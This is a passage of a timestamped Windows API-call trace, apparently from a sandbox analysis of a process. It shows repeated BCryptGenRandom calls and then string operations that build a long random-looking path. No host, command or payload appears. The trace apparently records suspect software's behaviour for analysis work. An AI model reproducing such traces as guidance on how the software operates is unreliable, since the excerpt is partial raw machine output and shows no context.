pbBuffer=0x46ffd5f) returned 0x0 [0191.846] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.846] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0191.846] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.846] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0191.846] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.846] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0191.846] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.846] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0191.846] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.846] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0191.847] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.847] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0191.847] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.847] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0191.847] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.847] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0191.847] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.847] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0191.847] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.847] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0191.847] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.848] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0191.848] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.848] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0191.848] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.848] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0191.848] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.848] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0191.848] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.848] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0191.848] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.848] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0191.849] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.849] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0191.849] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.849] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0191.849] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.849] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0191.849] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.849] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0191.849] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.849] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0191.849] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.849] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0191.850] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.850] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0191.850] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.850] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a01d87, cbBuffer=0x11, dwFlags=0x2 | out: pbBuffer=0x3a01d87) returned 0x0 [0191.850] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.850] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0191.850] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.851] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0191.851] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.851] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0191.851] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.851] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0191.851] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.851] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0191.851] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.851] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0191.851] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.851] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0191.852] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.852] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0191.852] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.852] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0191.852] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.852] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0191.852] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.852] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0191.852] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.852] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0191.852] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.852] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0191.853] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.853] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a01d98, cbBuffer=0x20, dwFlags=0x2 | out: pbBuffer=0x3a01d98) returned 0x0 [0191.853] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.853] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0191.853] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.853] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0191.853] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.853] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0191.853] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.853] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0191.853] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.853] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0191.854] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.854] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0191.854] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.854] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0191.854] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.854] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0191.854] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.854] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0191.854] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.854] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0191.854] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.854] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0191.855] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.855] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0191.855] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.855] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0191.855] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.855] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0191.855] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.855] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0191.856] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.856] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0191.856] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.856] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0191.856] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.856] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0191.856] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.856] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0191.856] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.856] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0191.856] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.856] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0191.857] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.857] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a01db8, cbBuffer=0x28, dwFlags=0x2 | out: pbBuffer=0x3a01db8) returned 0x0 [0191.857] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.857] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0191.857] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.857] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0191.857] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.857] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0191.858] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.858] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0191.858] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.858] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0191.858] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.858] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0191.858] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.858] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0191.858] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.858] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0191.858] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.858] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0191.859] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.859] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0191.859] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.859] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0191.859] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.859] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0191.859] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.859] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0191.859] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.859] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0191.860] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.860] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0191.860] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.860] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0191.860] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.860] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0191.860] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.860] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0191.860] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.860] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0191.860] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.861] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0191.861] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.861] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0191.861] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.861] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0191.861] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.861] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0191.861] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.861] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0191.861] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.861] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0191.862] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.862] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0191.862] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.862] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0191.862] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.862] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0191.862] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.862] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0191.862] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.862] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0191.863] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.863] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0191.863] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.863] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0191.863] GetProcessHeap () returned 0x440000 [0191.863] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x4726f0 [0191.863] lstrcpyA (in: lpString1=0x4726f0, lpString2="P\x1d \x03" | out: lpString1="P\x1d \x03") returned="P\x1d \x03" [0191.863] lstrcatA (in: lpString1="P\x1d \x03", lpString2="/tSmZxs3lotjaFy6arjkQ/nvcwy67vdt0aeek8B9Mo4jnGljj2jk6g/xKzD9tpQjnCtsd23/01Ruf0cMwZDtjk8I2UZcpcnsahlJd5x/5iTo7fNqvftvl2uc2fnibs3Jq3DHQbnf4rnggyy/" | out: lpString1="P\x1d \x03/tSmZxs3lotjaFy6arjkQ/nvcwy67vdt0aeek8B9Mo4jnGljj2jk6g/xKzD9tpQjnCtsd23/01Ruf0cMwZDtjk8I2UZcpcnsahlJd5x/5iTo7fNqvftvl2uc2fnibs3Jq3DHQbnf4rnggyy/") returned="P\x1d 